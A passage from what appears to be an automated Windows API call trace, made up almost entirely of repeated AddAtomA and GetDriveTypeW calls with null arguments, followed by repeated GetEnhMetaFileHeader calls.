AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.878] AddAtomA (lpString=0x0) returned 0x0 [0085.878] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.879] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.879] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.880] AddAtomA (lpString=0x0) returned 0x0 [0085.880] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.881] AddAtomA (lpString=0x0) returned 0x0 [0085.881] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.882] AddAtomA (lpString=0x0) returned 0x0 [0085.882] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.883] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.883] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.884] AddAtomA (lpString=0x0) returned 0x0 [0085.884] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.885] AddAtomA (lpString=0x0) returned 0x0 [0085.885] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.886] AddAtomA (lpString=0x0) returned 0x0 [0085.886] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.887] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.887] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.888] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.888] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.889] AddAtomA (lpString=0x0) returned 0x0 [0085.889] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0085.891] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 